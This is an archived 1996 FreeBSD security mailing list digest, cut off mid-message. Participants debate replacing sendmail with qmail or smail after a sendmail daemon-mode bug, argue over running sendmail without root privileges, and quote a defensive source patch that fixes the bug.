(PST) Received: from garrison.inetcan.net (root@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA18170 for ; Sun, 17 Nov 1996 14:21:34 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.7.6/8.7.3) id PAA01780; Sun, 17 Nov 1996 15:21:49 -0700 Date: Sun, 17 Nov 1996 15:21:49 -0700 (MST) From: Digital Dreamer To: pgiffuni@fps.biblos.unal.edu.co cc: Adam Shostack , Will Brown , freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, Pedro Giffuni S. wrote: > Adam Shostack wrote: > > > > On another note, how about qmail replacing sendmail? > > > > Adam > > > qmail has a homee page some where, I have a copy on my ftp site..I can > look if you need it. The homepage is at http://www.pobox.com/~qmail/software.html. dreamer From owner-freebsd-security Sun Nov 17 14:29:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA18557 for security-outgoing; Sun, 17 Nov 1996 14:29:37 -0800 (PST) Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA18515 for ; Sun, 17 Nov 1996 14:28:45 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.7.6/8.7.3) id PAA01894; Sun, 17 Nov 1996 15:31:16 -0700 Date: Sun, 17 Nov 1996 15:31:15 -0700 (MST) From: Digital Dreamer To: "az.com" cc: freebsd-security@freebsd.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, az.com wrote: > No longer do you have to worry about whether they have root or not - in > fact each user gets to be root! (in their own machine, of course ;) ) If > they want to hack, get fancy, reboot, etc. - its up to them - its *their* > system, not yours. > > If they blow out the virtual OS space because they gave their password out > to a grommet or made a mistake, you simply run a utility which checks and > repairs virtual file system's partitions and refreshes the virtual > 'environment's' OS from a template. Sounds nice, but kind of impractical. There's no unice (AFAIK) whose kernel could do this without essentially being rewritten. Besides, there's still the possibility of kernel bugs that would let you break out of your vm and get into that of others. dreamer From owner-freebsd-security Sun Nov 17 15:21:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA20887 for security-outgoing; Sun, 17 Nov 1996 15:21:44 -0800 (PST) Received: from garrison.inetcan.net (root@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA20864 for ; Sun, 17 Nov 1996 15:21:20 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.7.6/8.7.3) id PAA01894; Sun, 17 Nov 1996 15:31:16 -0700 Date: Sun, 17 Nov 1996 15:31:15 -0700 (MST) From: Digital Dreamer To: "az.com" cc: freebsd-security@freebsd.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, az.com wrote: > No longer do you have to worry about whether they have root or not - in > fact each user gets to be root! (in their own machine, of course ;) ) If > they want to hack, get fancy, reboot, etc. - its up to them - its *their* > system, not yours. > > If they blow out the virtual OS space because they gave their password out > to a grommet or made a mistake, you simply run a utility which checks and > repairs virtual file system's partitions and refreshes the virtual > 'environment's' OS from a template. Sounds nice, but kind of impractical. There's no unice (AFAIK) whose kernel could do this without essentially being rewritten. Besides, there's still the possibility of kernel bugs that would let you break out of your vm and get into that of others. dreamer From owner-freebsd-security Sun Nov 17 16:02:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA23279 for security-outgoing; Sun, 17 Nov 1996 16:02:55 -0800 (PST) Received: from assaris.sics.se (assaris.pdc.kth.se [130.237.221.57]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA23267 for ; Sun, 17 Nov 1996 16:02:45 -0800 (PST) Received: (from assar@localhost) by assaris.sics.se (8.7.5/8.7.3) id BAA17765; Mon, 18 Nov 1996 01:03:00 +0100 (MET) To: Digital Dreamer Cc: "az.com" , freebsd-security@FreeBSD.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem References: Mime-Version: 1.0 (generated by tm-edit 7.68) Content-Type: text/plain; charset=US-ASCII From: Assar Westerlund Date: 18 Nov 1996 01:02:56 +0100 In-Reply-To: Digital Dreamer's message of Sun, 17 Nov 1996 15:31:15 -0700 (MST) Message-ID: <5l20dss21b.fsf@assaris.sics.se> Lines: 12 X-Mailer: Gnus v5.2.40/Emacs 19.34 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Digital Dreamer writes: > On Sun, 17 Nov 1996, az.com wrote: [ about virtual machines ] > Sounds nice, but kind of impractical. There's no unice (AFAIK) whose > kernel could do this without essentially being rewritten. Besides, > there's still the possibility of kernel bugs that would let you break out > of your vm and get into that of others. Sounds like Fluke, but they have/will have recursive virtual machines. /assar From owner-freebsd-security Sun Nov 17 16:09:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA23815 for security-outgoing; Sun, 17 Nov 1996 16:09:38 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA23791 for ; Sun, 17 Nov 1996 16:09:19 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id TAA09457; Sun, 17 Nov 1996 19:05:45 -0500 From: Adam Shostack Message-Id: <199611180005.TAA09457@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> from "Pedro Giffuni S." at "Nov 17, 96 02:46:58 pm" To: pgiffuni@fps.biblos.unal.edu.co Date: Sun, 17 Nov 1996 19:05:45 -0500 (EST) Cc: freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Pedro Giffuni S. wrote: [Charset iso-8859-1 unsupported, filtering to ASCII...] | Adam Shostack wrote: | > | > On another note, how about qmail replacing sendmail? | qmail has a homee page some where, I have a copy on my ftp site..I can | look if you need it. | It would be good to have a port. www.qmail.org My suggestion was a little further reaching than that; I'm planning to replace sendmail with qmail real soon, and that helps me a lot. My suggestion was meant to imply the possibility of removing sendmail from the FreeBSD distribution, and only shipping qmail. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Sun Nov 17 16:51:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA26010 for security-outgoing; Sun, 17 Nov 1996 16:51:02 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA26003 for ; Sun, 17 Nov 1996 16:50:51 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPHuF-0003Re-00; Sun, 17 Nov 1996 17:49:47 -0700 To: Adam Shostack Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Sun, 17 Nov 1996 19:05:45 EST." <199611180005.TAA09457@homeport.org> References: <199611180005.TAA09457@homeport.org> Date: Sun, 17 Nov 1996 17:49:47 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199611180005.TAA09457@homeport.org> Adam Shostack writes: : My suggestion was meant to imply the possibility of removing : sendmail from the FreeBSD distribution, and only shipping qmail. I think that would be ill-advised. There are many other good, worthy mailers than just sendmail and qmail (exim and smail come to mind). Sendmail is well understood and well maintained with a very long track record. Other mailers, no matter how much better, don't match this track record. Or more succinctly: Better the devil you know... Warner From owner-freebsd-security Sun Nov 17 17:17:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA27484 for security-outgoing; Sun, 17 Nov 1996 17:17:12 -0800 (PST) Received: from agora.rdrop.com (root@agora.rdrop.com [199.2.210.241]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA27469 for ; Sun, 17 Nov 1996 17:17:03 -0800 (PST) Received: by agora.rdrop.com (Smail3.1.29.1 #17) id m0vPIKD-0008rpC; Sun, 17 Nov 96 17:16 PST Message-Id: From: batie@agora.rdrop.com (Alan Batie) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: imp@village.org (Warner Losh) Date: Sun, 17 Nov 1996 17:16:36 -0800 (PST) Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-Reply-To: from "Warner Losh" at Nov 17, 96 05:49:47 pm X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Sendmail is well understood and well maintained with a very long track > record. Other mailers, no matter how much better, don't match this > track record. Yup, sendmail has a long track record of the "security hole of the month"; I've yet to see one for smail. I would like to switch to sendmail, as I hear it deals with mail queues a lot better these days, and smail development seems to have gone into a black hole, but until sendmail can make it a whole month or two without a CERT advisory on it... -- Alan Batie ______ batie@agora.rdrop.com \ / Assimilate this! +1 503 452-0960 \ / --Worf, First Contact DE 3C 29 17 C0 49 7A 27 \/ 40 A5 3C 37 4A DA 52 B9 It is my policy to avoid purchase of any products from companies which use unrequested email advertisements or telephone solicitation. From owner-freebsd-security Sun Nov 17 17:34:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA28484 for security-outgoing; Sun, 17 Nov 1996 17:34:58 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA28457 for ; Sun, 17 Nov 1996 17:34:45 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id RAA14418; Sun, 17 Nov 1996 17:34:25 -0800 (PST) From: Don Lewis Message-Id: <199611180134.RAA14418@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 17:34:25 -0800 In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 7:05pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Adam Shostack , pgiffuni@fps.biblos.unal.edu.co Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 17, 7:05pm, Adam Shostack wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Pedro Giffuni S. wrote: } [Charset iso-8859-1 unsupported, filtering to ASCII...] } | Adam Shostack wrote: } | > } | > On another note, how about qmail replacing sendmail? } } | qmail has a homee page some where, I have a copy on my ftp site..I can } | look if you need it. } | It would be good to have a port. } } www.qmail.org } } My suggestion was a little further reaching than that; I'm } planning to replace sendmail with qmail real soon, and that helps me a } lot. My suggestion was meant to imply the possibility of removing } sendmail from the FreeBSD distribution, and only shipping qmail. Qmail doesn't do all the ESMTP negotiation that sendmail does. It keeps qmail simpler and less likely to be buggy, but not as functional. For instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX, but whatever version of qmail I just checked only supports 8BITMIME and PIPELINING. Sendmail 8.8.x adds ETRN. Qmail wants to look up the addresses of all the hosts listed in the MX records for and address so that it can compare them with the addresses of the host. This fixes the problem of "mail loops back to myself" that you get when you misconfigure DNS and/or sendmail, but I think it means that if qmail can't get the address of the most preferred MX host, it can't forward the message to any of the other mail exchangers because this could cause the message to loop. Sendmail's support of UUCP isn't wonderful (mostly a problem of getting DNS totally disabled). How well does qmail support UUCP? If you sent a message to ten different people at the same machine, qmail likes to send ten individual copies, even though this might be a large message and the link expensive (I believe this feature can be turned off). If you send a message to two people at two different addresses that have the same set of MX records, sendmail will send one copy of the message and let the mail exchanger at the other end duplicate the message (but this adds the latency of the second DNS lookup to the delivery of the first message). Other than the above, I think that qmail has a lot of advantages. --- Truck From owner-freebsd-security Sun Nov 17 18:39:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA02669 for security-outgoing; Sun, 17 Nov 1996 18:39:49 -0800 (PST) Received: from sovcom.kiae.su (sovcom.kiae.su [193.125.152.1]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA02664 for ; Sun, 17 Nov 1996 18:39:45 -0800 (PST) Received: by sovcom.kiae.su id AA14597 (5.65.kiae-1 ); Mon, 18 Nov 1996 05:26:18 +0300 Received: by sovcom.KIAE.su (UUMAIL/2.0); Mon, 18 Nov 96 05:26:17 +0300 Received: (from ache@localhost) by nagual.ru (8.8.2/8.8.2) id FAA01413; Mon, 18 Nov 1996 05:25:20 +0300 (MSK) Message-Id: <199611180225.FAA01413@nagual.ru> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611180134.RAA14418@salsa.gv.ssi1.com> from "Don Lewis" at "Nov 17, 96 05:34:25 pm" To: Don.Lewis@tsc.tdk.com (Don Lewis) Date: Mon, 18 Nov 1996 05:25:19 +0300 (MSK) Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org From: "=?KOI8-R?Q?=E1=CE=C4=D2=C5=CA_=FE=C5=D2=CE=CF=D7?=" (Andrey A. Chernov) Organization: self X-Class: Fast X-Mailer: ELM [version 2.4ME+ PL28 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Sendmail's support of UUCP isn't wonderful (mostly a problem of > getting DNS totally disabled). How well does qmail support UUCP? It is possible to totally disable DNS via /etc/service.switch: # To disable DNS search for sendmail hosts files -- Andrey A. Chernov http://www.nagual.ru/~ache/ From owner-freebsd-security Sun Nov 17 18:47:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA03047 for security-outgoing; Sun, 17 Nov 1996 18:47:53 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA03039 for ; Sun, 17 Nov 1996 18:47:46 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPJjD-0003aX-00; Sun, 17 Nov 1996 19:46:31 -0700 To: batie@agora.rdrop.com (Alan Batie) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Sun, 17 Nov 1996 17:16:36 PST." References: Date: Sun, 17 Nov 1996 19:46:30 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Alan Batie writes: : Yup, sendmail has a long track record of the "security hole of the month"; : I've yet to see one for smail. I would like to switch to sendmail, as I : hear it deals with mail queues a lot better these days, and smail : development seems to have gone into a black hole, but until sendmail can : make it a whole month or two without a CERT advisory on it... I've yet to see a CERT advisory on VMS, yet it has dozens of security holes that have been discussed in other lists. Just because smail hasn't had a CERT advisory doesn't make it secure. Sendmail is running on 10x or 100x more machines than smail. Since it is running on so many machines, it is more profitable to attack it. Also, CERT advisories generally cover things that the vendor puts out. If no one is the smail vendor, then it becomes harder to put out a CERT advisory on it. smail, exim, and qmail should be ports that people that are security minded can optionally use. exim, for example, breaks a number of things, but I use it anyway. Warner From owner-freebsd-security Sun Nov 17 18:48:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA03158 for security-outgoing; Sun, 17 Nov 1996 18:48:57 -0800 (PST) Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA03143 for ; Sun, 17 Nov 1996 18:48:53 -0800 (PST) Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id NAA13142; Mon, 18 Nov 1996 13:17:45 +1030 (CST) Received: by communica.com.au (4.1/SMI-4.1) id AA15359; Mon, 18 Nov 96 13:17:22 CDT From: newton@communica.com.au (Mark Newton) Message-Id: <9611180247.AA15359@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: batie@agora.rdrop.com (Alan Batie) Date: Mon, 18 Nov 1996 13:17:21 +1030 (CST) Cc: imp@village.org, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-Reply-To: from "Alan Batie" at Nov 17, 96 05:16:36 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Alan Batie wrote: > > Sendmail is well understood and well maintained with a very long track > > record. Other mailers, no matter how much better, don't match this > > track record. > > Yup, sendmail has a long track record of the "security hole of the month"; > I've yet to see one for smail. I would like to switch to sendmail, as I > hear it deals with mail queues a lot better these days, and smail > development seems to have gone into a black hole, but until sendmail can > make it a whole month or two without a CERT advisory on it... Of course, one of the main reasons why sendmail is so "dangerous" is that despite fifteen years of it-hurts-when-I-do-this style experience, we *still* run it as root! Why do we do this? Why does nobody understand that a UNIX process can't just gratuitously gain privileges unless some other privileged program gives them away? Given sendmail's history, why do so many people still trust it with root privileges when it doesn't actually need them?! sendmail really only needs root so that it can bind to the "privileged" port 25 when it's running in daemon mode. If you frob filesystem permissions sufficiently you can get away without providing sendmail with root privileges by running it with a non-root uid out of inetd (which is, indeed, precisely what I have done with it here at Communica, where sendmail runs as the unprivileged "smtp" user). Tradeoff: High-volume sites will not like the fact that it doesn't run as a daemon, because it has extra overhead associated with fork()/exec() from inetd. On the other hand, the fact that it a) isn't running as a daemon here; and b) wouldn't have any scary privileges if it did has given me a warm fuzzy glow in the context of the latest bug. - mark --- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au From owner-freebsd-security Sun Nov 17 18:55:54 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA03464 for security-outgoing; Sun, 17 Nov 1996 18:55:54 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA03459 for ; Sun, 17 Nov 1996 18:55:51 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPJrb-0003cC-00; Sun, 17 Nov 1996 19:55:11 -0700 To: newton@communica.com.au (Mark Newton) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: batie@agora.rdrop.com (Alan Batie), adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 13:17:21 +1030." <9611180247.AA15359@communica.com.au> References: <9611180247.AA15359@communica.com.au> Date: Sun, 17 Nov 1996 19:55:10 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <9611180247.AA15359@communica.com.au> Mark Newton writes: : sendmail really only needs root so that it can bind to the "privileged" : port 25 when it's running in daemon mode. If you frob filesystem permissions : sufficiently you can get away without providing sendmail with root : privileges by running it with a non-root uid out of inetd (which is, : indeed, precisely what I have done with it here at Communica, where : sendmail runs as the unprivileged "smtp" user). I don't buy this. You need to be able to create a mailbox of an arbitrary user, and then write to that mailbox with that user's uid, or to a shell of that user's uid. To do otherwise would introduce other security problems, some of which have been beat to death in the freebsd lists. What am I missing? Warner From owner-freebsd-security Sun Nov 17 19:02:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA03783 for security-outgoing; Sun, 17 Nov 1996 19:02:57 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA03774 for ; Sun, 17 Nov 1996 19:02:47 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id VAA10674; Sun, 17 Nov 1996 21:59:29 -0500 From: Adam Shostack Message-Id: <199611180259.VAA10674@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Warner Losh at "Nov 17, 96 07:55:10 pm" To: imp@village.org (Warner Losh) Date: Sun, 17 Nov 1996 21:59:29 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Warner Losh wrote: | In message <9611180247.AA15359@communica.com.au> Mark Newton writes: | : sendmail really only needs root so that it can bind to the "privileged" | : port 25 when it's running in daemon mode. If you frob filesystem permissions | : sufficiently you can get away without providing sendmail with root | : privileges by running it with a non-root uid out of inetd (which is, | : indeed, precisely what I have done with it here at Communica, where | : sendmail runs as the unprivileged "smtp" user). | | I don't buy this. You need to be able to create a mailbox of an | arbitrary user, and then write to that mailbox with that user's uid, | or to a shell of that user's uid. To do otherwise would introduce | other security problems, some of which have been beat to death in the | freebsd lists. Sendmail doesn't need to create/write to mailboxes, mail.local*, needs to do that. The problem with sendmail is that its a desert topping and a floor wax. It wants to do everything, and you can't do everything and be secure. Theres no solid seperation of privledge (as enforced by qmail's multiple programs under different uids). Theres no least privledge, as seen with qmail's one of 14 programs being setuid. The need for a setuid program to deliver mail does not mean that the mail parser, the MX handler, the envelope mangler, and the router core need to be setuid. *procmail, qmail-lspawn can substitute for mail.local. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Sun Nov 17 19:12:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA04412 for security-outgoing; Sun, 17 Nov 1996 19:12:57 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA04398; Sun, 17 Nov 1996 19:12:49 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id VAA147960; Sun, 17 Nov 1996 21:12:47 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id VAA27437; Sun, 17 Nov 1996 21:12:33 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199611180312.VAA27437@alecto.physics.uiuc.edu> Subject: Re: New sendmail bug... To: roberto@keltia.freenix.fr (Ollivier Robert), eric@sendmail.org Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) Cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org In-Reply-To: from "Ollivier Robert" at Nov 17, 96 12:58:53 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Hello! May be I am missing something, but I was not able to compile the patched version of the sendmail 8.7.6.4, as it appears in FreeBSD distribution (sup.freebsd.org). main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment *** Error code 1 Is it a problem due to the version of FreeBSD ? I tried it on 2.1.5-stable and 2.1.5-release; - results were the same. Thanks in advance for your suggestions. IgoR > > ------- main.c ------- > *** - Wed Dec 31 16:00:00 1969 > --- main.c Sat Nov 16 07:07:17 1996 > *************** > *** 493,507 **** > { > case MD_DAEMON: > case MD_FGDAEMON: > ! # ifdef DAEMON > ! if (RealUid != 0) > ! { > ! usrerr("Permission denied"); > ! exit(EX_USAGE); > ! } > ! vendor_daemon_setup(CurEnv); > ! /* fall through ... */ > ! # else > usrerr("Daemon mode not implemented"); > ExitStat = EX_USAGE; > break; > --- 493,499 ---- > { > case MD_DAEMON: > case MD_FGDAEMON: > ! # ifndef DAEMON > usrerr("Daemon mode not implemented"); > ExitStat = EX_USAGE; > break; > *************** > *** 899,904 **** > --- 891,904 ---- > /* fall through ... */ > > case MD_DAEMON: > + /* check for permissions */ > + if (RealUid != 0) > + { > + usrerr("Permission denied"); > + exit(EX_USAGE); > + } > + vendor_daemon_setup(CurEnv); > + > /* remove things that don't make sense in daemon mode */ > FullName = NULL; > GrabTo = FALSE; > *************** > *** 1932,1937 **** > --- 1932,1946 ---- > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) > + { > + #ifdef LOG > + if (LogLevel > 0) > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", > + RealUid, RealGid); > + #endif > + exit(EX_OSERR); > + } > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > > From owner-freebsd-security Sun Nov 17 19:14:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA04497 for security-outgoing; Sun, 17 Nov 1996 19:14:16 -0800 (PST) Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA04487 for ; Sun, 17 Nov 1996 19:14:06 -0800 (PST) Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id NAA13213; Mon, 18 Nov 1996 13:43:08 +1030 (CST) Received: by communica.com.au (4.1/SMI-4.1) id AA15775; Mon, 18 Nov 96 13:42:44 CDT From: newton@communica.com.au (Mark Newton) Message-Id: <9611180312.AA15775@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: imp@village.org (Warner Losh) Date: Mon, 18 Nov 1996 13:42:43 +1030 (CST) Cc: newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org In-Reply-To: from "Warner Losh" at Nov 17, 96 07:55:10 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Warner Losh wrote: > In message <9611180247.AA15359@communica.com.au> Mark Newton writes: > : sendmail really only needs root so that it can bind to the "privileged" > : port 25 when it's running in daemon mode. If you frob filesystem permissions > : sufficiently you can get away without providing sendmail with root > : privileges by running it with a non-root uid out of inetd (which is, > : indeed, precisely what I have done with it here at Communica, where > : sendmail runs as the unprivileged "smtp" user). > > I don't buy this. You need to be able to create a mailbox of an > arbitrary user, Garbage. You can create the mailbox at the same time that you create the user (as part of the adduser script). Set the mailbox's gid to "smtp" and run sendmail with the "smtp" gid (actually, I don't do this on our gateway machine at Communica: Nobody ever logs in to it, nobody ever receives mail on it, sendmail is configured to forward "local" mail to an internal host; special privileges to write local mailboxes aren't needed, so sendmail doesn't get them given to it). > and then write to that mailbox with that user's uid, No, write to the mailbox with the "smtp" gid (created for the purpose); The mailbox will already be owned by the destination user as part of the creation process. Remember, I did say that appropriate filesystem permission frobbing was necessary for this to work. Filesystem permissions for mail have never been something we've needed to worry about before because sendmail's bogus privilege level lets it ignore them all! This is the precise root cause of all of sendmail's security bugs throughout its entire history. > or to a shell of that user's uid. You allow shell escapes? I prefer an administrative model where the system administrator gets to decide who can run programs on the local host, rather than the users themselves. You don't let pleb users create files in a system's cgi-bin directory, why should you let them run commands out of their .forward files? Isn't sendmail a program used for transferring mail, rather than a program used to allow any user on the Internet to execute arbitrary commands on your system? Removing shell escapes from .forward is, IMHO, of a similar league to disabling the functionality of .rhosts files. Shell escapes are, and always have been, a feature which permits unaccountable abuses of security to provide "ease of use" which only a small subset of users really care about. > To do otherwise would introduce > other security problems, some of which have been beat to death in the > freebsd lists. I don't geddit. You're suggesting that taking privileges sendmail doesn't need away from it introduces more security problems than letting it run as root 24 hours per day? Doesn't the CERT archive provide you with ample emperical evidence to suggest that that claim is bogus? If sendmail's security is broken, I'd prefer to limit the damage to sendmail's realm of influence. Under the default configuration, if sendmail's security is broken the entire system falls victim to the attack. Personally, if someone is going to break into my gateway host I'd prefer them to do it as the smtp user 